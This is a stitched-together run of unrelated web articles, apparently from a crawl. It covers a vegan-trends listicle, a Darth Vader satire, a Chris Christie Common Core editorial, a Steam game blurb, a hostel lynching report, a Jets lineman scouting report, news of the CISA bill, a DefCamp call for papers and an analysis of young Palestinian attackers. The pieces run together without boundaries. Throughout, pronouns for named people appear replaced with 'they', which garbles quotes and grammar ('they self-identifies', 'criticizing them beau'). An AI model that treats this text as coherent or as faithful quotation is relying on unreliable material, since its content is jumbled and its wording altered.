"We will work to restore the good balance of our affiliates, and we will be looking for ways to begin repairing our relationship and trust with each resort as well as the communities in northern Michigan," the trio stated. "Our long-term, positive interaction continues to be a priority for us moving forward, and we hope to make the changes necessary in order to fulfill that goal."
Contact Katrease Stafford: kstafford@freepress.com or 313-223-4759. Follow them on Twitter @KatreaseS_Freep.
Read or Share this story: http://on.freep.com/1JSQUsW
Revolutionary plant-based products are everywhere!
Millions are being invested.
Private investors are putting millions into food startups like Beyond Meat , which had Microsoft mogul Bill Gates singing its praises, or Hampton Creek Foods , which garnered the attention of Asia's richest business person, Li Ka-Shing, along with a $23 million investment.
The millennials have arrived.
Forget the “lazy” stereotype. This new generation is now the largest , and they are ready to shake up the meat industry. According to The New York Times , 12 percent of millennials identify as vegetarian or vegan, the largest percentage of any generation. A recent article in The Guardian suggests this may be due to information sharing on social media. Regardless of why millennials are switching to a plant-based diet, the future for animals and the planet looks bright!
Amazing new vegan restaurants are taking over the world.
Vegan restaurants are not only popping up everywhere; they're also thriving. In fact, just this year both Veggie Grill and by Chloe. announced they were expanding. With the growing interest in plant-based eating, the number of delicious vegan restaurants will only continue to rise.
Vegan cheese is finally here.
Just this year, Food & Wine magazine named 2016 the year of vegan cheese. With companies like Kite Hill, Miyoko's Creamery, Chao Cheeses, and Dr. Cow, your taste buds won't even know what hit them. These specialty nut cheeses are creamy and delicious.
Fewer animals are being killed.
According to the USDA , 400 million fewer animals were killed in 2014 than in 2007. This means Americans are consuming less meat and fewer animals are needlessly suffering on cruel factory farms.
"Clean" (cultured) meat is on the rise.
Debuted in 2013 , clean meat is not only gaining a lot of attention, but may soon be affordable and available at your local grocery store. Clean meat is real meat grown naturally from cells that are taken non-invasively from animals. This remarkable product could mean a future of meat without animal slaughter.
Within the last 10 years we've made enormous strides toward reducing meat consumption and helping spare the lives of innocent animals. You can help make the next 10 years as great as the last by switching to a compassionate plant-based diet.
Vegetarian Starter Guide. Click here to order your FREE
Darth Vader has denied being ‘Dark Lord of the Sith' and said they self-identifies as a leading light of the Alt-Jedi movement today.
The Alt-Jedi are best known for rejecting mainstream Jediism in favour of provocative behaviour designed to outrage the consensus, such as force-choking people and destroying worlds in colossal gouts of laser fire.
Many younglings are drawn to the Alt-Jedi because it promises fun, transgression, a challenge to social norms, and the full power of the Dark Side of the Force.
Vader is believed to have become associated with the movement after losing their only girlfriend and realising they were too ugly both inside and out ever to get another.
“I find your lack of a pair disturbing,” Vader told us. “The snowflake is strong in you.
“Give into your hate. Let the anger flow through you. Only then can you know the true nature of Pepe the Frog memes.
“You rebel cucks,” they added.
Vader's children have distanced themselves from their father, describing them as a bit of a sorry loser and saying they won't have anything to do with them until they grow out of it.
“It's probably just a midlife crisis,” said Leia Organa.
“All that wearing black, saying outrageous stuff and driving around in a brand new TiE interceptor designed for someone much younger.
“It's a bit sad, really. We can't wait until they just buys a sweater and gets into gardening like all the other dads.
“I'll tell you what, no son of mine will turn out like that.”
“WE'RE DOING Common Core in New Jersey and we're going to continue. And this is one of those areas where I've agreed more with the president than not.” So proclaimed New Jersey Gov. Chris Christie (R) just 18 months ago. So what's to account for their recent change of heart about the K-12 academic standards?
Mr. Christie's complaints about federal implementation or loss of local control are risible. Private nonprofit groups and state education departments cooperated to produce the Common Core standards, which are voluntary and were embraced by 43 states and the District. That leaves one likely explanation: Like a number of candidates on this issue, Mr. Christie is happy to abandon principle to curry favor with conservative Republicans as they campaign for president.
In a Feb. 9 speech to the Dallas County Republican Party in Iowa — the state that will hold the first 2016 caucuses about a year from now — Mr. Christie spoke of their “grave concerns'' about Common Core, alleging that “the way the Obama administration has tried to implement it” has changed “the entire nature of it.” As The Post's Lyndsey Layton pointed out, the federal government plays no role in implementing academic standards and is barred by law from dictating what is taught or how it is taught.
It is true that the Education Department encouraged states to adopt rigorous college- or career-ready standards in awarding discretionary Race to the Top funds, with Common Core as the predominant choice. But nothing was mandated, and states had the option of developing alternatives. What makes Mr. Christie's born-again criticism of Common Core so rich is how ferociously they promoted New Jersey's adoption of Common Core in twice going after Race to the Top funds.
Mr. Christie's political expediency is not unique among GOP presidential hopefuls. Similar hypocrisy has been shown by Louisiana Gov. Bobby Jindal, Wisconsin Gov. Scott Walker and former Arkansas governor Mike Huckabee. In contrast, former Florida governor Jeb Bush and Ohio Gov. John Kasich have not wavered in their support of carefully developed standards that spell out the skills and knowledge that students should have by the end of each year from kindergarten through 12th grade. They know the standards don't dictate curriculum, teaching methods or instructional materials.
Of course, Mr. Christie, Mr. Jindal, Mr. Walker and Mr. Huckabee know that, too. They just don't let the facts get in the way of their pandering.
About This Game
CRAFT, PLAY AND SHARE!
Steam Exclusive Features
Make 4X BIGGER worlds - You have 4x times more space to craft whatever you like in the CREATE mode!
- You have 4x times more space to craft whatever you like in the CREATE mode! All elements are immediately accessible, there are no limitations to your imagination!
Ultra-precise controls with mouse, trackpad or touch support (for touch-screen only)
with mouse, trackpad or touch support (for touch-screen only) Several keyboard shortcuts to create worlds faster!
Windowed display or fullscreen mode
Cloud saving of your progression online and syncing across multiple PCs via with Steam Cloud
and syncing across multiple PCs via with Steam Cloud Cross-platform compatibility of your worlds: create on PC, view on Mobile or vice-versa
Game Features
Over 200 elements you can combine for different physical effects
A classic/retro 8-bit interface
Easy to understand tutorials get you started building worlds
15 Individual Campaigns: Initial Story, Dinosaurs, Pixel Art, Music, User-Created 1 & 2, Lasers and pipes, Contraptions, Humans, Zombies, Robots, Alien Invasion, Retro Gaming, Ninja and last but not least, the Ecology / Natural Disasters!
250 puzzle Levels in total -- dozens of hours of mind challenging content for your brain!
Compose your own chiptune melodies you can play in-game. You may choose the following instruments: Note, Guitar, Bass, Trumpet and Drums
Add advanced elements to your worlds:
Vehicles -- Cars, tanks and trucks are all available for your use within your world!
Contraptions -- LEDs, conveyor belts, lasers, pipes and multiple sensors are all available to bring your world into the age of technology!
Bring life to your worlds: Add humans and use Magic Job Powders to turn them into miners, builders, hunters, woodcutters or… ZOMBIES!
Zombies -- Turn your mild-mannered human into a brain eating beast that wreaks havoc on your world!
Robots -- Have robots taken over your world? You better obey your metal masters, puny human animals!
Ninja & Avatar -- Play with the controllable elements: Ninja, Avatar, Snake… and create your video game levels!
Add dinosaurs and protect them from extinction (or, recreate the BIG BANG and wipe them from the face of the Earth - the choice is yours!)
Add animals, fish and fireflies to your worlds and watch as their behavior creates “natural drama” that rivals any reality TV show!
Use our decorations and add awesome real-life wonders to your landscapes: The Eiffel Tower, a crashed UFO, the pyramids, futuristic buildings and a giant robot are all available at your fingertips!
Use TNT or C4 to wreak havoc with powerful explosions or light up your sky with meteors and fireworks
Share your creations with the world
READY FOR CRAFTING VIRTUAL WORLDS ON YOUR PC?The acclaimed world-building game featuring a unique mission-based approach is coming onto PC via Steam Early Access.- You have 4x times more space to craft whatever you like in the CREATE mode! Plus all elements are immediately accessible, there are no limitations to your imagination!Withversions andto date, this PC version is takingThe Sandbox is a unique world building & crafting game featuring over 200+ physics elements presented in 2D pixel blocks that can interact with each others. Players can craft amazing worlds, create pixel art, chain reactions, chiptune music, advanced contraptions, electric circuits or just play with physics.Play with basic elements ranging from simple water, stone, sand, wood, glass, lava, fire, to more complex: electricity, metal, virus, antivirus,heater, cooler, lasers, pipes, gems, sensors, leds TNT, C4, crosswire, conveyor belt, music instruments etc.That's not all, The Sandbox features also a wide range of casual elements, just for fun! Fish, bees, lion, flamingo, humans, zombies, robots, aliens, dinosaurs, monuments, tanks, cars, trucks!The Steam PC version of The Sandbox is aof Pixowl's famous HIT!, All Elements are unlocked and immediately accessible, as well as 15 original campaigns to explore: Initial Story, Dinosaurs, Pixel Art, Music, User-Created 1 & 2, Lasers and pipes, Contraptions, Humans, Zombies, Robots, Alien Invasion, Retro Gaming, Ninja and last but not least, the Ecology / Natural Disasters!A few thrilling features, exclusively on the PC version:[/list]Share your favorite universe in The Sandbox's Online Gallery ( http://www.thesandboxgame.com/worlds Search the gallery to see the creations of other players (1,000,000 worlds and climbing!)Rate other players' worlds and add in your own elements to give them a surprise effect
Japanese Scarecrows Predictably Weird, Creepy
Share on Facebook Share on Twitter Your information will *never* be shared or sold to a 3rd party. Promise.
This post may contain affiliate links. Read our disclosure.
This gallery came as somewhat of a surprise to us. Nothing in our experience had prepared us for a Japanese product that was weird or creepy or lifelike or weird and creepy and lifelike all at the same time. So we didn't really have a framework for understanding this story from the Tokyo Times, about the at turns impressive and at turn haunting scarecrows that dot the island's landscape. No framework at all:
Some Japanese scarecrows are… quite possibly [off-putting to] both passersby and the pests they are there to protect against. And whilst admittedly they do sometimes seem serene. They also appear sad, sullen, as well as suitably sinister. With the odd one even appearing almost semi-sentient.
We'll give you one more cropped pic, this one of the scarecrow described as “suitably sinister.” After that we'll send you off to the original post to see the rest of the gallery, including the creature that's “semi-sentient.” Warm and fuzzy these things are not:
Click.
The boys' hostel at NRS. (Bishwarup Dutta)
A 30-year-old man was lynched inside a hostel at NRS Medical College and Hospital with their hands tied to a pillar after being caught allegedly trying to steal a mobile phone.
The incident occurred around 6am on Sunday, shortly after an inmate of room No. 99 on the third floor of the boys' hostel saw a man put their hand through the window and grab their mobile phone, a junior doctor said.
The inmate sprang out of bed and screamed, bringing everyone running to that section of the hostel in Sealdah.
“By then, the man had entered a toilet on the third floor and locked themselves in. They broke a window pane and tried to escape but some of our boys climbed a wall and pulled them out. Then everyone started assaulting him,” the junior doctor said.
The man, who hadn't been identified until late on Sunday, was taken to a room in another wing of the four-storey building and the assault resumed, witnesses said.
They were then tied to a pillar outside the room and beaten up again, according to a construction worker named Rabiul.
“I saw some of the inmates hit them with rods,” said Rabiul, part of a team of masons and helpers building another floor at the hostel.
A little before 9am, officers of Entally police station received a phone call saying that a thief who had been caught at the hostel was “barely conscious” after being tied to a pillar and assaulted.
A team from the police outpost on the campus took the man to the hospital's emergency wing, where doctors declared them dead.
NRS Medical College and Hospital has set up a seven-member committee to probe the incident, principal Manju Banerjee said.
“The inquiry committee comprises myself, the medical superintendent and vice-principal, the dean and four other senior doctors. We are taking the incident very seriously and will start our probe on Monday,” Banerjee said.
Around 1,000 students stay in the boys' hostel but just over 200 of them were around on Sunday, the rest having gone home on study leave for examinations in December.
Two employees of the canteen on the third floor, where the man was found, were detained for interrogation.
“The two of them were present at the spot where the deceased was beaten up. We have yet to ascertain whether the duo played a role in the lynching or were mere witnesses to the crime,” said an officer of the homicide wing of the detective department.
“We are interrogating them to identify those who were responsible for the lynching. They have not given us any names so far,” the officer said on Sunday evening.
Sources at Entally police station said the post-mortem showed that the man died of internal haemorrhage caused by assault. “There were severe injuries on their body, including the head, both thighs, back and chest. They also had a deep cut mark near the lips,” an officer said.
Students said theft was common at the hostel. “Mobile phones and laptops worth close to Rs 40 lakh have been stolen from the hostel in the past three years alone. There are no guards at the entrance, including at night. Anyone can enter the hostel,” a junior doctor said.
They said simmering anger among the hostel inmates over repeated instances of theft came to a boil when the man was caught allegedly stealing.
“It wasn't anyone's intention to kill him. When they looked to be losing consciousness, many of the boys panicked and left. Someone fetched a blade to cut the ropes but dropped it there and left on seeing their condition,” a witness said.
This article is from the archive of our partner .
Ann Romney, classy horse lady and wife of Republican nominee Mitt Romney, would kindly appreciate it if you laid off from criticizing them beau, lest you want to "get in the ring" and try running for President yourself.
At least, that's what they told an Iowa radio station Thursday evening. Speaking at event earlier Thursday, they said "really hard for me as a wife," to watch the campaign. (She probably isn't a big Jason Sudeikis fan.) When they were interviewed by Radio Iowa later, they really went off on their husband's critics:
“Stop it. This is hard. You want to try it? Get in the ring,” they said. “This is hard and, you know, it's an important thing that we're doing right now and it's an important election and it is time for all Americans to realize how significant this election is and how lucky we are to have someone with Mitt's qualifications and experience and know-how to be able to have the opportunity to run this country.”
People have been tough on Mitt lately, after those pesky 47 percent comments. Peggy Noonan said the campaign needs "an intervention." Even Weekly Standard editor Bill Kristol has been beating up on Mitt, saying Mitt's controversial comments were "arrogant and stupid." While it's true people have been saying critical things about their husband lately, it would have been nice if the potential First Lady could come up with something better than, "well, why don't you try!?"
This article is from the archive of our partner The Wire.
We want to hear what you think about this article. Submit a letter to the editor or write to letters@theatlantic.com.
I don't think anyone realistically saw it coming that the Jets would lose Austin Howard to free agency. It was reported months ago that the Jets main priority in free agency was to resign the right tackle who had been somewhat underrated over the past two seasons. Turns out that this was just the first unfulfilled report of many during this free agency period. When the Jets couldn't come to terms with Howard, they quickly went to their back up plan and signed former Seahawks right tackle Breno Giacomini. Let's take a look at what Giacomini will bring to the Jets offensive line.
Name: Breno Giacomini
Age: 28
Exp: 6 years
Height: 6'7″
Weight: 318 pounds
Arm Length: 32 1/8″
Games Played: 41
Games Started: 33
Contract Details: Signed a four-year, $18 million contract. The deal contains $7 million guaranteed, including a $2.5 million signing bonus and first-year roster bonus of $1 million. 2014: $1 million, 2015: $4.5 million, 2016-2017: $5.125 million. (From Rotoworld.com)
Background
We all know Giacomini recently won the Superbowl with the Seahawks, but what led them there? Because of their athleticism, they started out as a tight end at Louisville until they came into their junior year weighing more than 300 pounds. They were named 2nd team All-Big East their senior year at right tackle. Giacomini was drafted in the 5th round of the 2008 NFL Draft by the Green Bay Packers. They started their career similar to Austin Howard as a member of the team's practice squad. The Seahawks signed Giacomini from the Packers practice squad in 2010. After being released, they were resigned by the Hawks for the 2011 season where they started 8 games. They started every game of the 2012 season at right tackle and was the starter in 2013, but missed 7 games due to knee surgery. They started down the stretch of the regular season and into the Seahawks playoff push to become Superbowl Champs.
Pass Protection
One of the big knocks on Giacomini is that they don't have great lateral quickness which should greatly affect their ability to pass protect. Despite this shortcoming, they are greatly improving in this part of the game. Although they let up 4 sacks in 2013, they only let up one QB hit. This is a great improvement from 2012 despite the same amount of sacks allowed. In 2012, they were rated by Pro Football Focus as one of the worst pass blockers in the NFL. In 2013, they improved their pass blocking efficiency and got better as the season went on. They were rated as the 3rd most efficient pass protector in the playoffs.
Their footwork is a little lumbering and slower than you you would want in a starting NFL tackle, but they don't waste any motion and doesn't over-set. Often times in pass protection, lineman will use false steps or take additional steps in order to change direction. Giacomini doesn't have this problem and because of it they are usually in good position to mirror defenders.
One problem they do have is their anchor. Giacomini is a tall lineman at 6'7″ and it can be used against them because they don't drop their anchor and bend properly.  They are susceptible to bull rushes and can also be pretty easily “push-pulled” off of their blocks. Another part of the problem here is their arm-length. Despite being described as a “long armed wall” by the Bleacher Report 1000, they have short arms for their position. While having a solid punch, they can't sustain their block when they lock out their arms.
Giacomini would also have better pass pro numbers if they would stop trying to get cute and just do their job. I don't know if this is something taught by Tom Cable, but Giacomini throws way too many cut blocks. It's good to mix in a cut block here or there, but Giacomini does it all the time and he's not very good at it. Instead of driving through defenders legs they basically just drops to the ground, which very rarely works. In week one against the Panthers, they kept playing games with cut blocks that got them into trouble.
Run Blocking
Scouring twitter and the rest of the internet for information on Giacomini, it's apparent that there is a common misconception that they are a mauler in the run game. While they play with great physicality and effort, I would not consider them a mauler. In fact, Giacomini is a better pass blocker right now than they are a run blocker. The fact that Marshawn Lynch was able to do what they did with this offensive line is incredible. There is a reason why they led the league in yards after first contact.
Giacomini has a quicker first step and better overall footspeed than I anticipated, but they are not very athletic and they often fall off blocks because of it. I would compare them to the Wide Receiver with great straight line speed, but can't run intermediate routes.  They are a little out of control run blocking and defensive lineman can pretty easily through them off.  They are pretty solid at getting to the second level, but once they get there they don't have the athleticism and body control to get on linebackers.
Again, they are decent when blocking the guy in front of him, but if they have to take scoop or reach steps to block a guy in the next gap over they aren't very good.  They are especially terrible when stepping to their left. Out of the games I watched on tape, I counted 24 plays where they took a drop zone step to cut off an inside defender to their left. They actually blocked this guy one time. They were often times thrown to the ground because they were completely out of control and other times they tried to cut block the defender and missed. It looks like they step underneath of themselves in this situation, which means they are off balance from their first step and can't recover.  They are much better when stepping right to fan block a defender to the outside.
Giacomini has really high pad level in run blocking. Because of this they often use their back for power in run blocking instead of their hips. Their technique often has their feet too close together and they can easily be tossed by defenders.
They were pretty good in combo blocking in Seattle's zone scheme and was proficient at taking over the down lineman when they had to combo block with JR Sweezy. This is actually difficult block to make on a regular basis. It takes good footwork and great chemistry between two linemen. Hopefully this is something they can develop with whoever plays right guard for the Jets in 2014.
Everything Else
Giacomini is a high effort player with a little bit of an edge to him.  They are a guy that will block to the whistle and sometimes through it.  They are a little bit of a throw back lineman in that he's not great athletically or technically, but you always notice them on film because of the effort they show. This is an attribute that shouldn't be diminished. Next time you watch an NFL game pay attention to the lineman about 2-3 seconds after the snap. I guarantee that most of them will be standing around watching the play instead of trying to get another block. When you watch the Jets this season, Giacomini will not be one of this lineman. They remind me of Willie Colon from an attitude standpoint. They will not back down from a fight and is the first guy to have their teammates back.
Another area where they are like Willie Colon is penalties.  They are one of the most penalized right tackles in the NFL. They get themselves into trouble when they are out of control and will hold on to defenders instead of moving their feet laterally. This is an area where they need to improve as they are not a good enough player to cost their team yards. On the other end of the spectrum, it never hurts to bring in a Superbowl Champion.
How they compare to Austin Howard
In the Bleacher Report 1000, Austin Howard was ranked as the 31st best right tackle in the NFL and Giacomini was ranked 20th. This is actually the ranking that made me realize that the BR 1000 is equivalent to throwing darts. Howard and Giacomini are very similar players. Both guys improved tremendously in pass protection, while struggling in the run game. Neither of them is very athletic. From a pure talent standpoint, I think Howard is slightly better than Giacomini, but the gap is closed by Giacomini's effort. They are both very average offensive lineman when compared to the rest of the league. I would not have paid Howard what they got in Oakland, so you are essentially getting a very similar player at a much cheaper rate. The only main difference is that Giacomini is 2 years older.
I also think your getting a little more consistency out of Giacomini. Howard had an up and down 2013. On my Big Man Reports, Howard would fluctuate between grades in the high 80s to the low 70s. From watching Giacomini's tape, I think your getting a guy who will be in the low 80s, maybe high 70s, every week. I think Scott Salmon at Gang Green Nation put it perfectly when they said Giacomini is a high floor, low ceiling player. Giacomini is essentially a similar player to Austin Howard but with a higher floor and lower ceiling.
How they fit with the Jets
When Tom Cable went to the Seahawks as their offensive line coach, they went to a primary zone blocking scheme in the run game. This is also a staple of the Jets offense. They do a nice job on the inside zone play, but really struggles when they try to run mid-zone and stretch type plays. I haven't seen them run enough of Power on tape to determine if they will be an upgrade from Austin Howard when running Power to the right. I think they will be good on the first level, but will probably struggle to get to linebackers in that scheme.
It will be interesting to see how Giacomini does in pass protection with the Jets. Alot of that has to do with the Quarterback behind him. Geno Smith does not have the pocket awareness that Russell Wilson displays in Seattle. Wilson's scrambling ability helped keep Giacomini's sack total down. Unless they improve in this aspect of the game, I can't see Geno Smith pocket presence making Giacomini's job any easier. Hopefully they continue their ascending trend here and produces similar numbers as they did in 2013.
Conclusion
If you take the contract details out of the equation, I don't think I'd be too thrilled with the Jets replacing Austin Howard with Breno Giacomini. Their backgrounds and skill sets are very similar, but Howard is two years younger and seems to be improving. However, we live in a world where there is a salary cap and the Jets are a team that is trying to slowly put the pieces in place to get back to the top of the AFC. To do this, they are constantly looking for value. Instead of paying about $6 million a year for an average right tackle, the Jets decided to pay about $4.5 million a year for an average right tackle. It's not an earth-shattering move, but one I understand and can get behind because value is the name of the game in free agency.
Related
(Image: C-SPAN live stream)
A controversial draft law, which one senator called a "surveillance bill by another name," has passed the Senate.
CISA, the Cybersecurity Information Sharing Act (S. 754), will allow private companies to share cyber-threat data with the federal government, including personal user data, in an effort to prevent cyberattacks, such as those on the scale of Target, Home Depot, and Sony. Companies that share data with federal agencies, including the National Security Agency (NSA), will be given legal and liability protections from lawsuits relating to data sharing.
The bill passed by 74-21. The bill will now go to conference with the House where it will be reconciled with two other measures, reports Reuters.
Critics say the bill does more to invade the privacy of ordinary Americans than protects US interests.
Sen. Ron Wyden, the only member of the intelligence committee to vote against the bill, said CISA will "have a limited impact on US cybersecurity."
All of the five pro-privacy amendments tabled by senators ahead of the vote failed.
One of the core privacy bolstering amendments, which would require sensitive and personal data to be removed before it is shared with federal agencies, was voted down. Another, which critics argue would make it more difficult to track threat-data sharing under freedom-of-information laws, was also struck down.
Sen. Dianne Feinstein (D-CA), who sponsored the bill in 2014, said the amendments would "undo the careful compromises we made on this bill."
Sen. Bernie Sanders (I-VT) was the only presidential candidate to vote against the bill, according to The Guardian. Sen. Lindsey Graham (R-SC), a Republican presidential candidate, voted for the bill.
Privacy and rights groups criticized the bill's passing in the wake of the vote.
In remarks, Mark Jaycox, legislative analyst at the Electronic Frontier Foundation, called the bill "fundamentally flawed due to its broad immunity clauses, vague definitions, and aggressive spying authorities."
"The passage of CISA reflects the misunderstanding many lawmakers have about technology and security. Computer security engineers were against it. Academics were against it. Technology companies, including some of Silicon Valley's biggest like Twitter and Salesforce, were against it," said Jaycox.
Greg Nojeim, senior counsel at the Center for Democracy & Technology, said the bill is a "huge step backwards for privacy rights."
"Now, more personal information will be shared with the NSA and with law enforcement agencies, and that information will certainly be used for purposes other than enhancing cybersecurity," said Nojeim.
The bill, known as a "zombie bill" after the bill previously failed CISA, has been met by unanimous public opposition to the bill.
Apple, Dropbox, Reddit, Twitter, Wikimedia Foundation (which owns Wikipedia), and Yelp, have said they oppose the bill. A trade group representing Facebook, Google, and others said it is "unable to support CISA as it is currently written."
But there was some fraying at the edges of the opposition.
Facebook was accused of secretly lobbying on CISA, but denied advocating "publicly or privately" for the bill. Google's parent company Alphabet did not comment publicly on its own, but executive chairperson indicated that the company may support future legislation. Speaking at an event in New York on Monday, Schmidt said they were "not an expert on the bill," but added that there "has to be a way" to share threat data with the government.
The security industry also lobbied against the bill.
In a letter published earlier this year, security experts including Jacob Appelbaum, Bruce Schneier, and Black Hat keynote speaker and lawyer Jennifer Granick, said that "waiving privacy rights will not make security sharing better."
If passed by the House, the president is not expected to veto the bill.
This post has been updated.
Everton are reportedly interested in signing Asmir Begovic from Chelsea.
Roberto Martinez has remained coy after being asked about Everton's reported interest in Asmir Begovic at their press conference this morning, which was broadcast on Everton's official Youtube channel.
The Sun have suggested that Everton are interested in signing Begovic from Chelsea.
However, Martinez said that they would not be commenting on transfer rumours, as they did not want to unsettle their ‘focused' squad.
"There's nothing to comment," Martinez said. "As I said, we have been working for two thirds of the season. There is no point for us to speak about any players. The window is closed and the squad is focused on the league."
Everton are believed to be interested in signing a new goalkeeper in the summer as they have not had a settled number one all season.
Tim Howard's performances have been error-prone throughout the campaign, while Martinez seems to have reservations over utilising Joel Robles as their first choice for the long term.
Begovic, meanwhile, could be available as they have struggled for appearances ever since moving to Chelsea last summer.
Begovic has failed to displace Thibaut Courtois in Chelsea's goal, and they have only played 11 Premier League matches for the London club so far when the Belgian international was out injured.
We take this opportunity to invite practitioners of application security and those who work or interact with all facets of application security to submit speaking proposals. DefCamp series is an international deep-knowledge technical conference with more than 1,500 international attendees expected. Read more on the about page.
Submit your presentation
Summaries not exceeding 500 words should be submitted (in plain text format) to us through our online CFP form for review and possible inclusion in the schedule. White paper and/or slides are a plus.
Speaker benefits
round economy class air tickets for one speaker
hotel accommodation
free Breakfast, lunch, and dinner / of course drinking
speakers dinner
free conference ticket (access to all areas)
up to 60 minutes presentation slot with an expected audience of more than 1,500 international attendees
exposure at one of the largest hacker communities in Central Eastern Europe
feedback from thousands of security specialists throughout our network
Meet world-wide recognized speakers & professionals
Position yourself as an expert
1 day trip after DefCamp – final details to be announced soon
Tracks available
2 Tracks for Technical, Research, Discoveries, How-to's etc
1 Track for Business (in)Security
Call for Paper Schedule
The official schedule of the Call for Papers submissions. The results might be delayed up to 14 days from the official schedule, depending on the number of submissions.
Please keep in mind that slots for DefCamp 2018 are filled by the FIFO rule (First in, First Selected) after the Conference Committee shared their opinion. That means that some sessions might never happen if we fill in all the slots fast.
1st June – 30th July (First CFP Selection Round)
31st July – 30th August (Second CFP Selection Round, if slots are still available)
1st September – 20th October (Last CFP Selection Round, if slots are still available)
Please note:
If you would like to showcase your company's products or technology, please review our Sponsorship opportunities and email us at [email protected] .
. DefCamp doesn't place any restrictions on topic. However, DefCamp requests something specific as well as general. If you presented your topic in the past, DefCamp will not accept your paper. DefCamp only wants new, creative and cool content. All speakers should show ‘real' demo(attack) to prove their theory.
Topics of Interest
Web Application Security – From language talks to frameworks and exploits.
Hardware – Including but not limited to: application bypass, hardware hacking basics, and defeating “secure” hardware.
Physical Security – Including but not limited to: badging applications, lock picking, physical access control, physical lock forensics and long range key duplication involving software.
Forensics – Including but not limited to: application, physical memory forensics, solid state disk forensics and network forensics.
Critical Infrastructure Security – Including but not limited to: SCADA, routing, satellite, Cloud and GSM.
Android/iPhone/Windows Mobile research
Reverse Engineering Malware and Malware Analysis
Rootkit Detection, Techniques, and Defenses
Exploitation Tactics
Cloud Security / Assessing Cloud Security
Legal Issues around EULA and related topics
Industry Panels
Critical Infrastructure Security
Applications of Cryptographic Techniques
Next Generation Exploit and Exploit Mitigation Techniques
NFC, WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security
etc.
Submit your presentation
The “new Palestinian,” or “neo-Palestinian,” is the name the Israeli security establishment has coined to refer to the generation of young Palestinians leading the current terror wave that Israel continues to find difficult to define, characterize and restrain some two and a half months after it began. Israeli security officials have compared the struggle against this brand of violence to jousting with windmills. There is no infrastructure, no planning, no hierarchy, no leaders, no organizations and no intelligence.
“This is something else entirely, something we have not completely identified,” admitted a higher-up in Israeli security speaking on condition of anonymity. “It is a social phenomenon, maybe even a mental one. It is the outcome of circumstances and deep processes that have come to fruition. At this stage, we don't have a clue where this is going and how long it will last,” they said.
Israeli security has described the so-called new Palestinian as young, slightly older than 20 years of age. That said, there have also been much younger assailants — for example, one 13-year-old, girls aged 15 and even an 11-year-old. The new Palestinian wears fashionable jeans, a patterned tricot shirt, and carries a smartphone in their back pocket and wears earphones connected to it by Bluetooth. They wrap a patriotic, Palestinian kaffiyeh around their neck, and in their hand they hold a large rock. The new Palestinian rages and fumes, defies authority, does not owe anything to anyone and is not subject to any kind of higher hierarchy. They don't listen to their parents, teachers, police, mukhtars (village leaders), family members or extended clan. They cleave to the global “independence rights” discourse.
They were around 3 or 5 years old during the second intifada (2000-2005) and doesn't really remember the horror of those years. In the early 2000s, more than 1,000 Israelis and more than 3,000 Palestinians were slaughtered. The new Palestinian goes to college but nothing will become of their education. It is estimated that at least 30,000 young Palestinians earn undergraduate degrees every year in the West Bank, and another 20,000 or so do the same in the Gaza Strip. They are discharged from university campuses into a total wasteland. There is nothing they can do with their degrees. There are no decent positions, no high-tech jobs and no serious economic infrastructure. At best, a young Palestinian graduate or academic can hope to secure a work permit in Israel and wash dishes in the bowels of a Tel Aviv restaurant.
The new Palestinian has no tangible hope of building a modern life for himself, accomplishing the things that they see others achieving on social networks. The new Palestinian is convinced that they are in the right, blind to the positions of others, and follows the international community's stance on the Palestinian-Israeli conflict and draws encouragement from it.  They are held captive to the narrative of the Israeli occupation, completely open to the various conspiracy theories about Israel that spread like wildfire through the Arab street. They nurture authentic inner rage that simmers while looking for an outlet.
There are approximately 800,000 Palestinian youths between the ages of 15 and 29 in Judea and Samaria. They are the engine of the current terror wave. They go out to demonstrate almost every day, defiantly and stubbornly. A significant percentage of these young demonstrators are female. If one removed the stones or Molotov cocktails from their hands, they would look like girls their age in calmer regions of the world. They are up-to-date, angry, frustrated and want change.
According to Israeli security experts, Israel is now “paying” for things that it is not even guilty of, such as Arab society restricting women and depriving them of equal rights. Also, the economies of the Arab states in general have long been weak, and the Palestinian economy in particular cannot give its youths any real hope of improvement to their standard of living, economic security and employment.
The new Palestinian is unaware that compared to the other Arabs in the Middle East today, their situation is relatively better than theirs. The only Arab region in which electricity is available 24/7 is in Judea and Samaria. The same is true regarding infant mortality, the standard of medical care and many other statistical facts. The new Palestinian feels under occupation and, more than anything else, wants freedom.
The distress of the new Palestinian also extends to the sense of the “end of the Abbas era.” Mahmoud Abbas, chairperson of the Palestine Liberation Organization and president of the Palestinian Authority (PA), announced many months ago that they are considering resigning, thus igniting a fierce war of succession among the various elements and dragging everyone toward extremism.
Sensitivity on the Temple Mount issue continues. Palestinians feel that the PA can't deliver the goods, and this is exacerbating the public's alienation from the authority. Friction between Israeli settlers and the Palestinians throughout Judea and Samaria is intensifying, as has been discussed in Al-Monitor.
These above elements, combined with the emergence of the new Palestinian, have generated aggravation, which in turn has produced the events of the last 10 weeks. To this, one must add the Islamic State (IS) phenomenon, which engages the hearts and minds of Arabs in the Middle East and elsewhere. IS is transforming violence, including beheadings, into romanticized, legitimate behavior. International recognition of Palestinian rights is also fueling the fury and frustration. But that's not all.
A Dec. 16 Ha'aretz article statistically characterizes the Palestinian attackers to date and has served to increase confusion among those attempting to analyze the phenomenon. It turns out that a segment of these Palestinians has never been exposed to or connected to “incitement on the social networks.” In most cases, the decision to perpetrate an attack, to grab a knife or axe and strike out at Jews, has been impulsive, a flare-up that can be triggered by any number of factors: an earlier terror attack that “inspires” the would-be assailant; an injury suffered by a relative, neighbor or friend at Israel's hands; a malicious rumor that reaches the potential terrorist's ears.
In short, a Palestinian youth might not have planned on carrying out an attack, but several factors stewed in their mind and heart until the startling outburst. “Under such circumstances it is impossible to fight, to thwart, to avert or to halt [an attack],” said a senior Israeli security source requesting anonymity. “All our intelligence and special resources become irrelevant.”
So what's the solution? Al-Monitor asked a senior Israeli security source, who responded on condition of anonymity, “There is no solution at the moment. We have 800,000 youths who are going somewhere, but we have no idea where. Even they don't completely know. We're talking about atmosphere, mood, and until it changes, we are stuck.”
The Israel Defense Forces assess that the terror wave will continue for the foreseeable future, at the least the coming year. At the moment, they are trying more to contain it and prevent the situation from further deteriorating, rather than attempting to stop it. “It will disappear suddenly, just the way it arrived,” a senior Israeli diplomat said hopefully and confidentially, “but we don't really know if, and when, that will happen.”
Miley Cyrus enlisted the help of some dancing little people to perform at iHeartRadio in Las Vegas on Saturday afternoon. Cyrus delivered a four-song set at the Clear Channel festival's outdoor Village stage, which including the first ever live rendition of their No. 1 single “Wrecking Ball.”
